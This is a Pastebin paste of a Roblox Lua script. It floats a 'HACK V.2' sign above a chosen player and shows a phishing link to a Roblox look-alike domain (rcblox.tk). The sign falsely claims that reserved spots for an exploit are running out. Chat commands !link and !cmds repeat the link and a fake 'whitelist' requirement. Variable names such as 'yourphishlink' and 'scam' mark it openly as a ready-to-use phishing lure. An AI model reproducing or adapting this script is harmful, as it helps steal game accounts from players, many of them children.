Advertisement
rdadadasdasdasda123

Untitled

Jul 21st, 2017
63
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. --by fr34ky @verm c:
  2.  
  3. scrub="bustinghoul"
  4.  
  5. yourphishlink="www.rcblox.tk/?id=60168"
  6.  
  7. scam=game.Players[scrub].Character
  8.  
  9.  
  10.  
  11. x = Instance.new("Part", scam)
  12. x.BrickColor = BrickColor.new("Really black")
  13. x.Size = Vector3.new(8.6, 6, 0.2)
  14. x.TopSurface = "Smooth"
  15. x.BottomSurface = 'Smooth'
  16. x.Anchored = true
  17. x.CanCollide = false
  18. x.Transparency = 0.2
  19. x.Rotation = Vector3.new(0, -70, 0)
  20.  
  21. --Text
  22.  
  23. GUI=Instance.new('SurfaceGui', x)
  24. GUI.Face = 'Front'
  25.  
  26. Text=Instance.new('TextLabel', GUI)
  27. Text.Text = 'HACK V.2'
  28. Text.TextColor3 = Color3.new(255,255,255)
  29. Text.TextStrokeColor3 = Color3.new(0,0,0)
  30. Text.TextStrokeTransparency = 0.5
  31. Text.Font = 'Code'
  32. Text.Size = UDim2.new(1, 0, 0.5, 0)
  33. Text.BackgroundTransparency = 1
  34. Text.Position = UDim2.new(0, 0, 0.63, 0)
  35. Text.TextScaled = true
  36. Text.Rotation = -900
  37.  
  38. Text2=Instance.new('TextLabel', GUI)
  39. Text2.Text = " GO TO THIS LINK : "..yourphishlink.." 3 Reserved Spots Left to use this Exploit. It will expire in 4 days, its your time to see if you have gotten a reserved spot !link"
  40. Text2.TextColor3 = Color3.new(255,255,255)
  41. Text2.TextStrokeColor3 = Color3.new(0,0,0)
  42. Text2.TextStrokeTransparency = 0.5
  43. Text2.Font = 'Code'
  44. Text2.Size = UDim2.new(1, 0, 0.6, 0)
  45. Text2.BackgroundTransparency = 1
  46. Text2.Position = UDim2.new(0, 0, 0.12, 0)
  47. Text2.TextScaled = true
  48. Text2.Rotation = -900
  49.  
  50. ---900
  51.  
  52. function Change()
  53. wait(0.001)
  54. x.Transparency = 0.1
  55. wait(0.001)
  56. x.Transparency = 0.2
  57. wait(0.001)
  58. x.Transparency = 0.3
  59. wait(0.001)
  60. x.Transparency = 0.4
  61. wait(0.001)
  62. x.Transparency = 0.5
  63. wait(0.001)
  64. x.Transparency = 0.6
  65. wait(0.001)
  66. x.Transparency = 0.7
  67. wait(0.001)
  68. x.Transparency = 0.8
  69. wait(0.001)
  70. x.Transparency = 0.9
  71. wait(0.001)
  72. x.Transparency = 1
  73. wait(0.5)
  74. x.Transparency = 0.9
  75. wait(0.001)
  76. x.Transparency = 0.8
  77. wait(0.001)
  78. x.Transparency = 0.7
  79. wait(0.001)
  80. x.Transparency = 0.6
  81. wait(0.001)
  82. x.Transparency = 0.5
  83. wait(0.001)
  84. x.Transparency = 0.4
  85. end
  86.  
  87. game.Players[scrub].Chatted:connect(function(msg)
  88. if msg == "!link" then
  89. Text.Text = ''
  90. Text2.Text = ''
  91. Change()
  92. Text.Text = 'XYZv6.0.6'
  93. Text2.Text = " "..yourphishlink.." "
  94. end
  95. end)
  96.  
  97. game.Players[scrub].Chatted:connect(function(msg)
  98. if msg == "!cmds" then
  99. Text.Text = ''
  100. Text2.Text = ''
  101. Change()
  102. Text2.Text = 'You need to get whitelisted first! Please chat !link'
  103. Text.Text = 'HACK V.2'
  104. end
  105. end)
  106.  
  107. while wait() do
  108. x.CFrame = scam.Torso.CFrame*CFrame.new(0, 0, -7)
  109. x.CFrame = x.CFrame * CFrame.Angles(91,0,0)
  110. if scam.Humanoid.Health == 0 then
  111. x:Destroy()
  112. end
  113. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement